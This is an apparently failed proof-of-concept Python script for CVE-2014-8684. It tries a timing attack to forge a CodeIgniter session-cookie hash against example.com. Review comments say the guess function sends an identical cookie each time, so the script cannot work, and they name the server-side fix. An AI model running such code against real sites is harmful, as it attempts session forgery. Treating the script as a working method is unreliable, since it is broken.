Created
April 25, 2022 21:01
attempt at poc for CVE-2014-8684. It did not work
# CVE-2014-8684 testing
# It was not successful on my target, so I did not do any work past the bare testing stage.
# Network variance was larger than the timing difference in length.
import requests | |
import time | |
# Response.elapsed from requests is not used for timing: it stops once the
# response headers have been parsed, not when the whole response has arrived.

# Fetch the login page once to obtain a server-issued session cookie.
r = requests.get("https://example.com/login")
jar = r.cookies
valid_cookie = jar['ci_session']

# The last 32 characters of the cookie are treated as the hex digest (printed
# below as "md5"); everything before them is the serialized session payload.
obj, valid_hash = valid_cookie[:-32], valid_cookie[-32:]
empty_hash = "0" * 32  # defined but not referenced in the visible script
print(f"Actual md5: {valid_hash}")

# Hex alphabet iterated over by the search loop at the bottom of the file.
chars = "abcdef" + "0123456789"
def guess(hash):
    """Return the mean wall-clock time of 100 GET requests to the login page.

    Before timing, the ``ci_session`` cookie in the module-level ``jar`` is
    replaced with the payload ``obj`` followed by the first 31 characters of
    ``valid_hash`` and a literal ``0``.

    NOTE(review): ``hash`` is used only as the label in the printed line; the
    cookie sent is the same on every call, so the averages returned for
    different arguments compare identical requests.

    Context (from the CVE description, not from this file): CVE-2014-8684 is
    about session-cookie hashes being compared with ordinary string
    comparison. The server-side remedy is a constant-time comparison such as
    PHP's ``hash_equals`` and upgrading the framework.

    Args:
        hash: Label printed next to the measured average.

    Returns:
        Mean seconds per request, measured with ``time.time()``.
    """
    url = "https://example.com/login"
    attempts = 100
    jar.set('ci_session', f"{obj}{valid_hash[:31]}0", domain='example.com', path='/')

    total = 0
    for _ in range(attempts):
        began = time.time()
        requests.get(url, cookies=jar)
        # Clock is read after requests.get() returns, i.e. once the full
        # response has been received.
        total += time.time() - began

    average = total / attempts
    print(f"{hash} : {average}")
    return average
# Track the two-character prefix whose guess() call had the largest mean time.
# NOTE(review): as guess() is written in this file, every call sends the same
# cookie, so differences between the averages reflect network noise only. A
# negative or random result here says nothing about whether the server has
# been patched; confirm the framework version and its hash comparison instead.
leader = 0
answer = "00"
padding = '0' * 30
for i in chars:
    for j in chars:
        candidate = i + j
        result = guess(candidate + padding)
        if result <= leader:
            continue
        leader = result
        answer = candidate
print(answer)